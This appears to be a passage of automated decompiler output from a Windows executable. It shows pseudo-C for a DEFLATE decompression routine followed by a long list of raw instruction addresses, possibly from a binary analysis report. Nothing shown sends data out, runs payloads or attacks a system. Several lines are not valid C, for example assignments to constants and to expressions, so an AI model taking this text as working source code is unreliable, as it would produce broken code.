												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x432e90;
												if( *0x432e90 != 0) {
													L22:
													_t412 =  *0x40a5e8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a5ec; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x431d0c; // 0x432610
													_t446[5] = _t414;
													_t415 =  *0x431d08; // 0x432e10
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x431d10;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x432190;
													if(_t416 < 0x432190) {
														L15:
														__eflags = _t416 - 0x431f4c;
														_t438 = 8;
														if(_t416 > 0x431f4c) {
															__eflags = _t416 - 0x432110;
															if(_t416 >= 0x432110) {
																__eflags = _t416 - 0x432170;
																if(_t416 < 0x432170) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x431d10, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x431d10 + _t440;
														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
														 *0x432e90 =  *0x432e90 + 1;
														__eflags =  *0x432e90;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                                                                                                                                          0x00406d85
                                                                                                                                                                          0x00406d85
                                                                                                                                                                          0x00406d85
                                                                                                                                                                          0x00406d85
                                                                                                                                                                          0x00406d85
                                                                                                                                                                          0x00406d89
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406d8f
                                                                                                                                                                          0x00406d8f
                                                                                                                                                                          0x00406d92
                                                                                                                                                                          0x00406d95
                                                                                                                                                                          0x00406d9a
                                                                                                                                                                          0x00406d9c
                                                                                                                                                                          0x00406d9f
                                                                                                                                                                          0x00406da2
                                                                                                                                                                          0x00406da5
                                                                                                                                                                          0x00406da5
                                                                                                                                                                          0x00406da8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406daa
                                                                                                                                                                          0x00406daa
                                                                                                                                                                          0x00406dad
                                                                                                                                                                          0x00406db2
                                                                                                                                                                          0x00406db4
                                                                                                                                                                          0x00406db7
                                                                                                                                                                          0x00406dbd
                                                                                                                                                                          0x00406b1c
                                                                                                                                                                          0x00406b1c
                                                                                                                                                                          0x00406b1f
                                                                                                                                                                          0x00406b25
                                                                                                                                                                          0x00406b2b
                                                                                                                                                                          0x00406b34
                                                                                                                                                                          0x00406b3a
                                                                                                                                                                          0x00406b3d
                                                                                                                                                                          0x00406b44
                                                                                                                                                                          0x00406b49
                                                                                                                                                                          0x00406b4f
                                                                                                                                                                          0x00406b5a
                                                                                                                                                                          0x00406b5a
                                                                                                                                                                          0x00406dc3
                                                                                                                                                                          0x00406dc3
                                                                                                                                                                          0x00406dcd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406dd3
                                                                                                                                                                          0x00406dd3
                                                                                                                                                                          0x00406dd7
                                                                                                                                                                          0x00406dda
                                                                                                                                                                          0x00406dda
                                                                                                                                                                          0x00406dde
                                                                                                                                                                          0x00406de4
                                                                                                                                                                          0x00406de4
                                                                                                                                                                          0x00406de7
                                                                                                                                                                          0x00406dea
                                                                                                                                                                          0x00406df0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406df2
                                                                                                                                                                          0x00406e14
                                                                                                                                                                          0x00406e14
                                                                                                                                                                          0x00406e17
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406df4
                                                                                                                                                                          0x00406df8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406dfe
                                                                                                                                                                          0x00406dfe
                                                                                                                                                                          0x00406e01
                                                                                                                                                                          0x00406e04
                                                                                                                                                                          0x00406e09
                                                                                                                                                                          0x00406e0b
                                                                                                                                                                          0x00406e0e
                                                                                                                                                                          0x00406e11
                                                                                                                                                                          0x00406e11
                                                                                                                                                                          0x00406e19
                                                                                                                                                                          0x00406e19
                                                                                                                                                                          0x00406e1f
                                                                                                                                                                          0x00406e22
                                                                                                                                                                          0x00406e25
                                                                                                                                                                          0x00406e25
                                                                                                                                                                          0x00406e2c
                                                                                                                                                                          0x00406e30
                                                                                                                                                                          0x00406e34
                                                                                                                                                                          0x00406e37
                                                                                                                                                                          0x00406e3a
                                                                                                                                                                          0x00406e40
                                                                                                                                                                          0x00406e45
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406e47
                                                                                                                                                                          0x00406e5b
                                                                                                                                                                          0x00406e5b
                                                                                                                                                                          0x00406e5f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406e49
                                                                                                                                                                          0x00406e4c
                                                                                                                                                                          0x00406e4c
                                                                                                                                                                          0x00406e53
                                                                                                                                                                          0x00406e58
                                                                                                                                                                          0x00406e58
                                                                                                                                                                          0x00406e58
                                                                                                                                                                          0x00406e61
                                                                                                                                                                          0x00406e61
                                                                                                                                                                          0x00406e64
                                                                                                                                                                          0x00406e72
                                                                                                                                                                          0x00406e78
                                                                                                                                                                          0x00406e7d
                                                                                                                                                                          0x00406e83
                                                                                                                                                                          0x00406e89
                                                                                                                                                                          0x00406e8f
                                                                                                                                                                          0x00406e96
                                                                                                                                                                          0x00406eaa
                                                                                                                                                                          0x00406eaa
                                                                                                                                                                          0x00407479
                                                                                                                                                                          0x00407479
                                                                                                                                                                          0x00407479
                                                                                                                                                                          0x0040747e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406ab6
                                                                                                                                                                          0x00406ab6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004070b1
                                                                                                                                                                          0x004070b1
                                                                                                                                                                          0x004070b5
                                                                                                                                                                          0x004070b8
                                                                                                                                                                          0x004070bb
                                                                                                                                                                          0x004070be
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004070c4
                                                                                                                                                                          0x004070c4
                                                                                                                                                                          0x004070e9
                                                                                                                                                                          0x004070e9
                                                                                                                                                                          0x004070e9
                                                                                                                                                                          0x004070eb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004070c9
                                                                                                                                                                          0x004070c9
                                                                                                                                                                          0x004070cd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004070d3
                                                                                                                                                                          0x004070d3
                                                                                                                                                                          0x004070d6
                                                                                                                                                                          0x004070d9
                                                                                                                                                                          0x004070dc
                                                                                                                                                                          0x004070de
                                                                                                                                                                          0x004070e0
                                                                                                                                                                          0x004070e3
                                                                                                                                                                          0x004070e6
                                                                                                                                                                          0x004070e6
                                                                                                                                                                          0x004070e6
                                                                                                                                                                          0x004070ed
                                                                                                                                                                          0x004070ed
                                                                                                                                                                          0x004070f5
                                                                                                                                                                          0x004070f8
                                                                                                                                                                          0x004070fb
                                                                                                                                                                          0x004070fe
                                                                                                                                                                          0x00407102
                                                                                                                                                                          0x00407105
                                                                                                                                                                          0x00407107
                                                                                                                                                                          0x0040710a
                                                                                                                                                                          0x0040710c
                                                                                                                                                                          0x00407120
                                                                                                                                                                          0x00407120
                                                                                                                                                                          0x00407123
                                                                                                                                                                          0x0040713d
                                                                                                                                                                          0x0040713d
                                                                                                                                                                          0x00407140
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407146
                                                                                                                                                                          0x00407146
                                                                                                                                                                          0x00407149
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040714f
                                                                                                                                                                          0x0040714f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040714f
                                                                                                                                                                          0x00407125
                                                                                                                                                                          0x00407128
                                                                                                                                                                          0x0040712f
                                                                                                                                                                          0x00407132
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407132
                                                                                                                                                                          0x0040710e
                                                                                                                                                                          0x00407112
                                                                                                                                                                          0x00407115
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040715a
                                                                                                                                                                          0x0040715a
                                                                                                                                                                          0x0040717f
                                                                                                                                                                          0x0040717f
                                                                                                                                                                          0x0040717f
                                                                                                                                                                          0x00407181
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040715f
                                                                                                                                                                          0x0040715f
                                                                                                                                                                          0x00407163
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00407169
                                                                                                                                                                          0x00407169
                                                                                                                                                                          0x0040716c
                                                                                                                                                                          0x0040716f
                                                                                                                                                                          0x00407172
                                                                                                                                                                          0x00407174
                                                                                                                                                                          0x00407176
                                                                                                                                                                          0x00407179
                                                                                                                                                                          0x0040717c
                                                                                                                                                                          0x0040717c
                                                                                                                                                                          0x0040717c
                                                                                                                                                                          0x00407183
                                                                                                                                                                          0x0040718b
                                                                                                                                                                          0x0040718e
                                                                                                                                                                          0x00407191
                                                                                                                                                                          0x00407193
                                                                                                                                                                          0x00407196
                                                                                                                                                                          0x00407196
                                                                                                                                                                          0x00407198
                                                                                                                                                                          0x0040719c
                                                                                                                                                                          0x0040719f
                                                                                                                                                                          0x004071a2
                                                                                                                                                                          0x004071a5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004071ab
                                                                                                                                                                          0x004071ab
                                                                                                                                                                          0x004071d0
                                                                                                                                                                          0x004071d0
                                                                                                                                                                          0x004071d0
                                                                                                                                                                          0x004071d2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004071b0
                                                                                                                                                                          0x004071b0
                                                                                                                                                                          0x004071b4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004071ba
                                                                                                                                                                          0x004071ba
                                                                                                                                                                          0x004071bd
                                                                                                                                                                          0x004071c0
                                                                                                                                                                          0x004071c3
                                                                                                                                                                          0x004071c5
                                                                                                                                                                          0x004071c7
                                                                                                                                                                          0x004071ca
                                                                                                                                                                          0x004071cd
                                                                                                                                                                          0x004071cd
                                                                                                                                                                          0x004071cd
                                                                                                                                                                          0x004071d4
                                                                                                                                                                          0x004071d4
                                                                                                                                                                          0x004071dc
                                                                                                                                                                          0x004071df
                                                                                                                                                                          0x004071e2
